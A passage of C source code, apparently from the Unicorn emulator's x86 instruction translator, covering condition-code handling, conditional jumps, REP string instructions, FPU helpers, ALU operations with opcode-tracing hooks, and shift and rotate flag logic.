CC_OP_ADCOX: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_Z }; case CC_OP_CLR: return (CCPrepare) { .cond = TCG_COND_ALWAYS, .mask = -1 }; case CC_OP_POPCNT: return (CCPrepare) { .cond = TCG_COND_EQ, .reg = tcg_ctx->cpu_cc_src, .mask = -1 }; default: { MemOp size = (s->cc_op - CC_OP_ADDB) & 3; TCGv t0 = gen_ext_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_dst, size, false); return (CCPrepare) { .cond = TCG_COND_EQ, .reg = t0, .mask = -1 }; } } } /* perform a conditional store into register 'reg' according to jump opcode value 'b'. In the fast case, T0 is guaranted not to be used. */ static CCPrepare gen_prepare_cc(DisasContext *s, int b, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int inv, jcc_op, cond; MemOp size; CCPrepare cc; TCGv t0; inv = b & 1; jcc_op = (b >> 1) & 7; switch (s->cc_op) { case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: /* We optimize relational operators for the cmp/jcc case. */ size = s->cc_op - CC_OP_SUBB; switch (jcc_op) { case JCC_BE: tcg_gen_mov_tl(tcg_ctx, s->tmp4, s->cc_srcT); gen_extu(tcg_ctx, size, s->tmp4); t0 = gen_ext_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, size, false); cc = (CCPrepare) { .cond = TCG_COND_LEU, .reg = s->tmp4, .reg2 = t0, .mask = -1, .use_reg2 = true }; break; case JCC_L: cond = TCG_COND_LT; goto fast_jcc_l; case JCC_LE: cond = TCG_COND_LE; fast_jcc_l: tcg_gen_mov_tl(tcg_ctx, s->tmp4, s->cc_srcT); gen_exts(tcg_ctx, size, s->tmp4); t0 = gen_ext_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, size, true); cc = (CCPrepare) { .cond = cond, .reg = s->tmp4, .reg2 = t0, .mask = -1, .use_reg2 = true }; break; default: goto slow_jcc; } break; default: slow_jcc: /* This actually generates good code for JC, JZ and JS. */ switch (jcc_op) { case JCC_O: cc = gen_prepare_eflags_o(s, reg); break; case JCC_B: cc = gen_prepare_eflags_c(s, reg); break; case JCC_Z: cc = gen_prepare_eflags_z(s, reg); break; case JCC_BE: gen_compute_eflags(s); cc = (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_Z | CC_C }; break; case JCC_S: cc = gen_prepare_eflags_s(s, reg); break; case JCC_P: cc = gen_prepare_eflags_p(s, reg); break; case JCC_L: gen_compute_eflags(s); if (reg == tcg_ctx->cpu_cc_src) { reg = s->tmp0; } tcg_gen_shri_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_src, 4); /* CC_O -> CC_S */ tcg_gen_xor_tl(tcg_ctx, reg, reg, tcg_ctx->cpu_cc_src); cc = (CCPrepare) { .cond = TCG_COND_NE, .reg = reg, .mask = CC_S }; break; default: case JCC_LE: gen_compute_eflags(s); if (reg == tcg_ctx->cpu_cc_src) { reg = s->tmp0; } tcg_gen_shri_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_src, 4); /* CC_O -> CC_S */ tcg_gen_xor_tl(tcg_ctx, reg, reg, tcg_ctx->cpu_cc_src); cc = (CCPrepare) { .cond = TCG_COND_NE, .reg = reg, .mask = CC_S | CC_Z }; break; } break; } if (inv) { cc.cond = tcg_invert_cond(cc.cond); } return cc; } static void gen_setcc1(DisasContext *s, int b, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCPrepare cc = gen_prepare_cc(s, b, reg); if (cc.no_setcond) { if (cc.cond == TCG_COND_EQ) { tcg_gen_xori_tl(tcg_ctx, reg, cc.reg, 1); } else { tcg_gen_mov_tl(tcg_ctx, reg, cc.reg); } return; } if (cc.cond == TCG_COND_NE && !cc.use_reg2 && cc.imm == 0 && cc.mask != 0 && (cc.mask & (cc.mask - 1)) == 0) { tcg_gen_shri_tl(tcg_ctx, reg, cc.reg, ctztl(cc.mask)); tcg_gen_andi_tl(tcg_ctx, reg, reg, 1); return; } if (cc.mask != -1) { tcg_gen_andi_tl(tcg_ctx, reg, cc.reg, cc.mask); cc.reg = reg; } if (cc.use_reg2) { tcg_gen_setcond_tl(tcg_ctx, cc.cond, reg, cc.reg, cc.reg2); } else { tcg_gen_setcondi_tl(tcg_ctx, cc.cond, reg, cc.reg, cc.imm); } } static inline void gen_compute_eflags_c(DisasContext *s, TCGv reg) { gen_setcc1(s, JCC_B << 1, reg); } /* generate a conditional jump to label 'l1' according to jump opcode value 'b'. In the fast case, T0 is guaranted not to be used. */ static inline void gen_jcc1_noeob(DisasContext *s, int b, TCGLabel *l1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCPrepare cc = gen_prepare_cc(s, b, s->T0); if (cc.mask != -1) { tcg_gen_andi_tl(tcg_ctx, s->T0, cc.reg, cc.mask); cc.reg = s->T0; } if (cc.use_reg2) { tcg_gen_brcond_tl(tcg_ctx, cc.cond, cc.reg, cc.reg2, l1); } else { tcg_gen_brcondi_tl(tcg_ctx, cc.cond, cc.reg, cc.imm, l1); } } /* Generate a conditional jump to label 'l1' according to jump opcode value 'b'. In the fast case, T0 is guaranted not to be used. A translation block must end soon. */ static inline void gen_jcc1(DisasContext *s, int b, TCGLabel *l1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCPrepare cc = gen_prepare_cc(s, b, s->T0); gen_update_cc_op(s); if (cc.mask != -1) { tcg_gen_andi_tl(tcg_ctx, s->T0, cc.reg, cc.mask); cc.reg = s->T0; } set_cc_op(s, CC_OP_DYNAMIC); if (cc.use_reg2) { tcg_gen_brcond_tl(tcg_ctx, cc.cond, cc.reg, cc.reg2, l1); } else { tcg_gen_brcondi_tl(tcg_ctx, cc.cond, cc.reg, cc.imm, l1); } } /* XXX: does not work with gdbstub "ice" single step - not a serious problem */ static TCGLabel *gen_jz_ecx_string(DisasContext *s, target_ulong next_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); gen_op_jnz_ecx(s, s->aflag, l1); gen_set_label(tcg_ctx, l2); gen_jmp_tb(s, next_eip, 1); gen_set_label(tcg_ctx, l1); return l2; } static inline void gen_stos(DisasContext *s, MemOp ot) { gen_op_mov_v_reg(s, MO_32, s->T0, R_EAX); gen_string_movl_A0_EDI(s); gen_op_st_v(s, ot, s->T0, s->A0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_EDI); } static inline void gen_lods(DisasContext *s, MemOp ot) { gen_string_movl_A0_ESI(s); gen_op_ld_v(s, ot, s->T0, s->A0); gen_op_mov_reg_v(s, ot, R_EAX, s->T0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_ESI); } static inline void gen_scas(DisasContext *s, MemOp ot) { gen_string_movl_A0_EDI(s); gen_op_ld_v(s, ot, s->T1, s->A0); gen_op(s, OP_CMPL, ot, R_EAX); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_EDI); } static inline void gen_cmps(DisasContext *s, MemOp ot) { gen_string_movl_A0_EDI(s); gen_op_ld_v(s, ot, s->T1, s->A0); gen_string_movl_A0_ESI(s); gen_op(s, OP_CMPL, ot, OR_TMP0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_ESI); gen_op_add_reg_T0(s, s->aflag, R_EDI); } static void gen_bpt_io(DisasContext *s, TCGv_i32 t_port, int ot) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->flags & HF_IOBPT_MASK) { TCGv_i32 t_size = tcg_const_i32(tcg_ctx, 1 << ot); TCGv t_next = tcg_const_tl(tcg_ctx, s->pc - s->cs_base); gen_helper_bpt_io(tcg_ctx, tcg_ctx->cpu_env, t_port, t_size, t_next); tcg_temp_free_i32(tcg_ctx, t_size); tcg_temp_free(tcg_ctx, t_next); } } static inline void gen_ins(DisasContext *s, MemOp ot) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_string_movl_A0_EDI(s); /* Note: we must do this dummy write first to be restartable in case of page fault. */ tcg_gen_movi_tl(tcg_ctx, s->T0, 0); gen_op_st_v(s, ot, s->T0, s->A0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_EDX]); tcg_gen_andi_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, 0xffff); gen_helper_in_func(tcg_ctx, ot, s->T0, s->tmp2_i32); gen_op_st_v(s, ot, s->T0, s->A0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_EDI); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); } } static inline void gen_outs(DisasContext *s, MemOp ot) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_string_movl_A0_ESI(s); gen_op_ld_v(s, ot, s->T0, s->A0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_EDX]); tcg_gen_andi_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, 0xffff); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T0); gen_helper_out_func(tcg_ctx, ot, s->tmp2_i32, s->tmp3_i32); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_ESI); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); } } /* same method as Valgrind : we generate jumps to current or next instruction */ #define GEN_REPZ(op) \ static inline void gen_repz_ ## op(DisasContext *s, MemOp ot, \ target_ulong cur_eip, target_ulong next_eip) \ { \ TCGLabel *l2; \ gen_update_cc_op(s); \ l2 = gen_jz_ecx_string(s, next_eip); \ gen_ ## op(s, ot); \ gen_op_add_reg_im(s, s->aflag, R_ECX, -1); \ /* a loop would cause two single step exceptions if ECX = 1 \ before rep string_insn */ \ if (s->repz_opt) \ gen_op_jz_ecx(s, s->aflag, l2); \ gen_jmp(s, cur_eip); \ } #define GEN_REPZ2(op) \ static inline void gen_repz_ ## op(DisasContext *s, MemOp ot, \ target_ulong cur_eip, \ target_ulong next_eip, \ int nz) \ { \ TCGLabel *l2; \ gen_update_cc_op(s); \ l2 = gen_jz_ecx_string(s, next_eip); \ gen_ ## op(s, ot); \ gen_op_add_reg_im(s, s->aflag, R_ECX, -1); \ gen_update_cc_op(s); \ gen_jcc1(s, (JCC_Z << 1) | (nz ^ 1), l2); \ if (s->repz_opt) \ gen_op_jz_ecx(s, s->aflag, l2); \ gen_jmp(s, cur_eip); \ } GEN_REPZ(movs) GEN_REPZ(stos) GEN_REPZ(lods) GEN_REPZ(ins) GEN_REPZ(outs) GEN_REPZ2(scas) GEN_REPZ2(cmps) static void gen_helper_fp_arith_ST0_FT0(TCGContext *tcg_ctx, int op) { switch (op) { case 0: gen_helper_fadd_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 1: gen_helper_fmul_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 2: gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 3: gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 4: gen_helper_fsub_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 5: gen_helper_fsubr_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 6: gen_helper_fdiv_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 7: gen_helper_fdivr_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; } } /* NOTE the exception in "r" op ordering */ static void gen_helper_fp_arith_STN_ST0(TCGContext *tcg_ctx, int op, int opreg) { TCGv_i32 tmp = tcg_const_i32(tcg_ctx, opreg); switch (op) { case 0: gen_helper_fadd_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 1: gen_helper_fmul_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 4: gen_helper_fsubr_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 5: gen_helper_fsub_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 6: gen_helper_fdivr_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 7: gen_helper_fdiv_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; } } static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_update_cc_op(s); gen_jmp_im(s, cur_eip); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, trapno)); s->base.is_jmp = DISAS_NORETURN; } /* Generate #UD for the current instruction. The assumption here is that the instruction is known, but it isn't allowed in the current cpu mode. */ static void gen_illegal_opcode(DisasContext *s) { gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base); } /* if d == OR_TMP0, it means memory operand (address in A0) */ static void gen_op(DisasContext *s1, int op, MemOp ot, int d) { TCGContext *tcg_ctx = s1->uc->tcg_ctx; uc_engine *uc = s1->uc; /* Invalid lock prefix when destination is not memory or OP_CMPL. */ if ((d != OR_TMP0 || op == OP_CMPL) && s1->prefix & PREFIX_LOCK){ gen_illegal_opcode(s1); return; } if (d != OR_TMP0) { gen_op_mov_v_reg(s1, ot, s1->T0, d); } else if (!(s1->prefix & PREFIX_LOCK)) { gen_op_ld_v(s1, ot, s1->T0, s1->A0); } switch(op) { case OP_ADCL: gen_compute_eflags_c(s1, s1->tmp4); if (s1->prefix & PREFIX_LOCK) { tcg_gen_add_tl(tcg_ctx, s1->T0, s1->tmp4, s1->T1); tcg_gen_atomic_add_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T0, s1->mem_index, ot | MO_LE); } else { tcg_gen_add_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); tcg_gen_add_tl(tcg_ctx, s1->T0, s1->T0, s1->tmp4); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update3_cc(s1, s1->tmp4); set_cc_op(s1, CC_OP_ADCB + ot); break; case OP_SBBL: gen_compute_eflags_c(s1, s1->tmp4); if (s1->prefix & PREFIX_LOCK) { tcg_gen_add_tl(tcg_ctx, s1->T0, s1->T1, s1->tmp4); tcg_gen_neg_tl(tcg_ctx, s1->T0, s1->T0); tcg_gen_atomic_add_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T0, s1->mem_index, ot | MO_LE); } else { tcg_gen_sub_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); tcg_gen_sub_tl(tcg_ctx, s1->T0, s1->T0, s1->tmp4); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update3_cc(s1, s1->tmp4); set_cc_op(s1, CC_OP_SBBB + ot); break; case OP_ADDL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_atomic_add_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T1, s1->mem_index, ot | MO_LE); } else { tcg_gen_add_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update2_cc(s1); set_cc_op(s1, CC_OP_ADDB + ot); break; case OP_SUBL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_neg_tl(tcg_ctx, s1->T0, s1->T1); tcg_gen_atomic_fetch_add_tl(tcg_ctx, s1->cc_srcT, s1->A0, s1->T0, s1->mem_index, ot | MO_LE); tcg_gen_sub_tl(tcg_ctx, s1->T0, s1->cc_srcT, s1->T1); } else { tcg_gen_mov_tl(tcg_ctx, s1->cc_srcT, s1->T0); tcg_gen_sub_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, s1->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && (hook->op_flags & UC_TCG_OP_FLAG_DIRECT) ) { // TCGv is just an offset to tcg_ctx so it's safe to do so. gen_uc_traceopcode(tcg_ctx, hook, (TCGv_i64)s1->T0, (TCGv_i64)s1->T1, 1 << ((ot & MO_SIZE) + 3), uc, s1->pc_start); } } } gen_op_update2_cc(s1); set_cc_op(s1, CC_OP_SUBB + ot); break; default: case OP_ANDL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_atomic_and_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T1, s1->mem_index, ot | MO_LE); } else { tcg_gen_and_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update1_cc(s1); set_cc_op(s1, CC_OP_LOGICB + ot); break; case OP_ORL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_atomic_or_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T1, s1->mem_index, ot | MO_LE); } else { tcg_gen_or_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update1_cc(s1); set_cc_op(s1, CC_OP_LOGICB + ot); break; case OP_XORL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_atomic_xor_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T1, s1->mem_index, ot | MO_LE); } else { tcg_gen_xor_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update1_cc(s1); set_cc_op(s1, CC_OP_LOGICB + ot); break; case OP_CMPL: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s1->T1); tcg_gen_mov_tl(tcg_ctx, s1->cc_srcT, s1->T0); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s1->T0, s1->T1); if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, s1->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && (hook->op_flags & UC_TCG_OP_FLAG_CMP) ) { // TCGv is just an offset to tcg_ctx so it's safe to do so. gen_uc_traceopcode(tcg_ctx, hook, (TCGv_i64)s1->T0, (TCGv_i64)s1->T1, 1 << ((ot & MO_SIZE) + 3), uc, s1->pc_start); } } } set_cc_op(s1, CC_OP_SUBB + ot); break; } } /* if d == OR_TMP0, it means memory operand (address in A0) */ static void gen_inc(DisasContext *s1, MemOp ot, int d, int c) { TCGContext *tcg_ctx = s1->uc->tcg_ctx; if (s1->prefix & PREFIX_LOCK) { if (d != OR_TMP0) { /* Lock prefix when destination is not memory */ gen_illegal_opcode(s1); return; } tcg_gen_movi_tl(tcg_ctx, s1->T0, c > 0 ? 1 : -1); tcg_gen_atomic_add_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T0, s1->mem_index, ot | MO_LE); } else { if (d != OR_TMP0) { gen_op_mov_v_reg(s1, ot, s1->T0, d); } else { gen_op_ld_v(s1, ot, s1->T0, s1->A0); } tcg_gen_addi_tl(tcg_ctx, s1->T0, s1->T0, (c > 0 ? 1 : -1)); gen_op_st_rm_T0_A0(s1, ot, d); } gen_compute_eflags_c(s1, tcg_ctx->cpu_cc_src); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s1->T0); set_cc_op(s1, (c > 0 ? CC_OP_INCB : CC_OP_DECB) + ot); } static void gen_shift_flags(DisasContext *s, MemOp ot, TCGv result, TCGv shm1, TCGv count, bool is_right) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 z32, s32, oldop; TCGv z_tl; /* Store the results into the CC variables. If we know that the variable must be dead, store unconditionally. Otherwise we'll need to not disrupt the current contents. */ z_tl = tcg_const_tl(tcg_ctx, 0); if (cc_op_live[s->cc_op] & USES_CC_DST) { tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_cc_dst, count, z_tl, result, tcg_ctx->cpu_cc_dst); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, result); } if (cc_op_live[s->cc_op] & USES_CC_SRC) { tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_cc_src, count, z_tl, shm1, tcg_ctx->cpu_cc_src); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, shm1); } tcg_temp_free(tcg_ctx, z_tl); /* Get the two potential CC_OP values into temporaries. */ tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, (is_right ? CC_OP_SARB : CC_OP_SHLB) + ot); if (s->cc_op == CC_OP_DYNAMIC) { oldop = tcg_ctx->cpu_cc_op; } else { tcg_gen_movi_i32(tcg_ctx, s->tmp3_i32, s->cc_op); oldop = s->tmp3_i32; } /* Conditionally store the CC_OP value. */ z32 = tcg_const_i32(tcg_ctx, 0); s32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, s32, count); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_cc_op, s32, z32, s->tmp2_i32, oldop); tcg_temp_free_i32(tcg_ctx, z32); tcg_temp_free_i32(tcg_ctx, s32); /* The CC_OP value is no longer predictable. */ set_cc_op(s, CC_OP_DYNAMIC); } static void gen_shift_rm_T1(DisasContext *s, MemOp ot, int op1, int is_right, int is_arith) { TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong mask = (ot == MO_64 ? 0x3f : 0x1f); /* load */ if (op1 == OR_TMP0) { gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, op1); } tcg_gen_andi_tl(tcg_ctx, s->T1, s->T1, mask); tcg_gen_subi_tl(tcg_ctx, s->tmp0, s->T1, 1); if (is_right) { if (is_arith) { gen_exts(tcg_ctx, ot, s->T0); tcg_gen_sar_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_sar_tl(tcg_ctx, s->T0, s->T0, s->T1); } else { gen_extu(tcg_ctx, ot, s->T0); tcg_gen_shr_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_shr_tl(tcg_ctx, s->T0, s->T0, s->T1); } } else { tcg_gen_shl_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_shl_tl(tcg_ctx, s->T0, s->T0, s->T1); } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); gen_shift_flags(s, ot, s->T0, s->tmp0, s->T1, is_right); } static void gen_shift_rm_im(DisasContext *s, MemOp ot, int op1, int op2, int is_right, int is_arith) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mask = (ot == MO_64 ? 0x3f : 0x1f); /* load */ if (op1 == OR_TMP0) gen_op_ld_v(s, ot, s->T0, s->A0); else gen_op_mov_v_reg(s, ot, s->T0, op1); op2 &= mask; if (op2 != 0) { if (is_right) { if (is_arith) { gen_exts(tcg_ctx, ot, s->T0); tcg_gen_sari_tl(tcg_ctx, s->tmp4, s->T0, op2 - 1); tcg_gen_sari_tl(tcg_ctx, s->T0, s->T0, op2); } else { gen_extu(tcg_ctx, ot, s->T0); tcg_gen_shri_tl(tcg_ctx, s->tmp4, s->T0, op2 - 1); tcg_gen_shri_tl(tcg_ctx, s->T0, s->T0, op2); } } else { tcg_gen_shli_tl(tcg_ctx, s->tmp4, s->T0, op2 - 1); tcg_gen_shli_tl(tcg_ctx, s->T0, s->T0, op2); } } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); /* update eflags if non zero shift */ if (op2 != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->tmp4); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); set_cc_op(s, (is_right ? CC_OP_SARB : CC_OP_SHLB) + ot); } } static void gen_rot_rm_T1(DisasContext *s, MemOp ot, int op1, int is_right) { TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong mask = (ot == MO_64 ? 0x3f : 0x1f); TCGv_i32 t0, t1; /* load */ if (op1 == OR_TMP0) { gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, op1); } tcg_gen_andi_tl(tcg_ctx, s->T1, s->T1, mask); switch (ot) { case MO_8: /* Replicate the 8-bit input so that a 32-bit rotate works. */ tcg_gen_ext8u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_muli_tl(tcg_ctx, s->T0, s->T0, 0x01010101); goto do_long; case MO_16: /* Replicate the 16-bit input so that a 32-bit rotate works. */ tcg_gen_deposit_tl(tcg_ctx, s->T0, s->T0, s->T0, 16, 16); goto do_long; do_long: #ifdef TARGET_X86_64 case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T1); if (is_right) { tcg_gen_rotr_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, s->tmp3_i32); } else { tcg_gen_rotl_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, s->tmp3_i32); } tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); break; #endif default: if (is_right) { tcg_gen_rotr_tl(tcg_ctx, s->T0, s->T0, s->T1); } else { tcg_gen_rotl_tl(tcg_ctx, s->T0, s->T0, s->T1); } break; } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); /* We'll need the flags computed into CC_SRC. */ gen_compute_eflags(s); /* The value that was "rotated out" is now present at the other end of the word. Compute C into CC_DST and O into CC_SRC2. Note that since we've computed the flags into CC_SRC, these variables are currently dead. */ if (is_right) { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s->T0, mask - 1); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, mask); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_dst, 1); } else { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s->T0, mask); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, 1); } tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_src2, 1); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_dst); /* Now conditionally store the new CC_OP value. If the shift count is 0 we keep the CC_OP_EFLAGS setting so that only CC_SRC is live. Otherwise reuse CC_OP_ADCOX which have the C and O flags split out exactly as we computed above. */ t0 = tcg_const_i32(tcg_ctx, 0); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t1, s->T1); tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, CC_OP_ADCOX); tcg_gen_movi_i32(tcg_ctx, s->tmp3_i32, CC_OP_EFLAGS); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_cc_op, t1, t0, s->tmp2_i32, s->tmp3_i32); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); /* The CC_OP value is no longer predictable. */ set_cc_op(s, CC_OP_DYNAMIC); } static void gen_rot_rm_im(DisasContext *s, MemOp ot, int op1, int op2, int is_right) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mask = (ot == MO_64 ? 0x3f : 0x1f); int shift; /* load */ if (op1 == OR_TMP0) { gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, op1); } op2 &= mask; if (op2 != 0) { switch (ot) { #ifdef TARGET_X86_64 case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); if (is_right) { tcg_gen_rotri_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, op2); } else { tcg_gen_rotli_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, op2); } tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); break; #endif default: if (is_right) { tcg_gen_rotri_tl(tcg_ctx, s->T0, s->T0, op2); } else { tcg_gen_rotli_tl(tcg_ctx, s->T0, s->T0, op2); } break; case MO_8: mask = 7; goto do_shifts; case MO_16: mask = 15; do_shifts: shift = op2 & mask; if (is_right) { shift = mask + 1 - shift; } gen_extu(tcg_ctx, ot, s->T0); tcg_gen_shli_tl(tcg_ctx, s->tmp0, s->T0, shift); tcg_gen_shri_tl(tcg_ctx, s->T0, s->T0, mask + 1 - shift); tcg_gen_or_tl(tcg_ctx, s->T0, s->T0, s->tmp0); break; } } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); if (op2 != 0) { /* Compute the flags into CC_SRC. */ gen_compute_eflags(s); /* The value that was "rotated out" is now present at the other end of the word. Compute C into CC_DST and O into CC_SRC2. Note that since we've computed the flags into CC_SRC, these variables are currently dead. */ if (is_right) { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s->T0, mask - 1); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, 